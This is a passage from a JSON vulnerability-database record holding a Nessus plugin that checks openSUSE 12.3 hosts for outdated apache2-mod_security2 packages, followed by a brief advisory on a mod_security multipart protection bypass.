2.7.5.\n\n - ruleset update to 2.2.8-0-g0f07cbb.\n\n - new configuration framework private to mod_security2:\n /etc/apache2/conf.d/mod_security2.conf loads\n /usr/share/apache2-mod_security2/rules/modsecurity_crs_1\n 0_setup.conf, then /etc/apache2/mod_security2.d/*.conf ,\n as set up based on advice in\n /etc/apache2/conf.d/mod_security2.conf Your\n configuration starting point is\n /etc/apache2/conf.d/mod_security2.conf\n\n - !!! Please note that mod_unique_id is needed for\n mod_security2 to run!\n\n - modsecurity-apache_2.7.5-build_fix_pcre.diff changes\n erroneaous linker parameter, preventing rpath in shared\n object.\n\n - fixes contained for the following bugs :\n\n - CVE-2009-5031, CVE-2012-2751 [bnc#768293] request\n parameter handling\n\n - [bnc#768293] multi-part bypass, minor threat\n\n - CVE-2013-1915 [bnc#813190] XML external entity\n vulnerability\n\n - CVE-2012-4528 [bnc#789393] rule bypass\n\n - CVE-2013-2765 [bnc#822664] NULL pointer dereference\n crash\n\n - new from 2.5.9 to 2.7.5, only major changes :\n\n - GPLv2 replaced by Apache License v2\n\n - rules are not part of the source tarball any longer, but\n maintaned upstream externally, and included in this\n package.\n\n - documentation was externalized to a wiki. Package\n contains the FAQ and the reference manual in html form.\n\n - renamed the term 'Encryption' in directives that\n actually refer to hashes. See CHANGES file for more\n details.\n\n - new directive SecXmlExternalEntity, default off\n\n - byte conversion issues on s390x when logging fixed.\n\n - many small issues fixed that were discovered by a\n Coverity scanner\n\n - updated reference manual\n\n - wrong time calculation when logging for some timezones\n fixed.\n\n - replaced time-measuring mechanism with finer granularity\n for measured request/answer phases. (Stopwatch remains\n for compat.)\n\n - cookie parser memory leak fix\n\n - parsing of quoted strings in multipart\n Content-Disposition headers fixed.\n\n - SDBM deadlock fix\n\n - @rsub memory leak fix\n\n - cookie separator code improvements\n\n - build failure fixes\n\n - compile time option --enable-htaccess-config (set)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=768293\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=789393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=813190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=822664\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-08/msg00020.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-mod_security2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_security2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_security2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_security2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"apache2-mod_security2-2.7.5-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"apache2-mod_security2-debuginfo-2.7.5-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"apache2-mod_security2-debugsource-2.7.5-2.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_security2 / apache2-mod_security2-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:47", "bulletinFamily": "software", "cvelist": ["CVE-2012-2751", "CVE-2012-4528"], "description": "It's possible to bypass protection if both Content-Disposition: attachment and Content-Type: multipart are present", "edition": 1, "modified": "2012-07-09T00:00:00", "published": "2012-07-09T00:00:00", "id": "SECURITYVULNS:VULN:12451", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12451", "title": "Apache mod_security protection bypass", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}
